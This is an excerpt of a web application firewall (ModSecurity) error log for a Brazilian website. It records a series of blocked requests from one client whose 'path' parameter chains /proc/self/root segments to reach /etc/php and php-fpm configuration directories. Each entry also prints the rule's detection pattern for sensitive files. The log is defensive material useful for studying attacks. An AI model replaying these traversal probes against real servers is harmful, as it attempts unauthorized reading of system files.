[tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIukzinOy1jxa1j4fQJAAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:39:57.000905 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:50888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIvNa6ubjKNq_cu4ZT-wAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:40:01.995584 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:50894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIwcdf6f5d65gmYZSOgQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:40:04.240717 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:47016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIxOoXxyEfFpUF8f8rNgAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:40:05.808211 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:47018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIxfu8EFLIOrSqIpvE3QAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:40:08.225258 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:47022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIyOyqAr6etmhZHNp2gwAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:40:10.691235 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:51640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIyuoXxyEfFpUF8f8rOAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:40:14.493370 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:51644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIzew_le52K8_3pV2edwAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:40:24.478984 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:51652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI2NY0UrI5A3LftIxPUQAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:40:32.302357 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:43980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI4EzinOy1jxa1j4fQPQAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:40:33.603540 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:38188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI4cdf6f5d65gmYZSOjQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:40:36.009132 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:38196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI5OyqAr6etmhZHNp2kAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:40:38.449439 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:38202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI5uyqAr6etmhZHNp2lQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:40:39.794422 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:60696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI5_u8EFLIOrSqIpvE9wAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:40:49.873127 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:60712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI8ew_le52K8_3pV2ehgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:40:51.134066 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:51506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI89a6ubjKNq_cu4ZUNAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:40:53.493342 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:51508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI9UzinOy1jxa1j4fQRwAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:40:56.913524 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:51516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI-NY0UrI5A3LftIxPXwAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:40:58.218272 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:51526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpI-vu8EFLIOrSqIpvE_gAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:04.089791 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:56428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJAOyqAr6etmhZHNp2pAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:41:05.424575 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:56444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJAfu8EFLIOrSqIpvFAwAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:41:06.745382 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:56456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJAuw_le52K8_3pV2eigAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
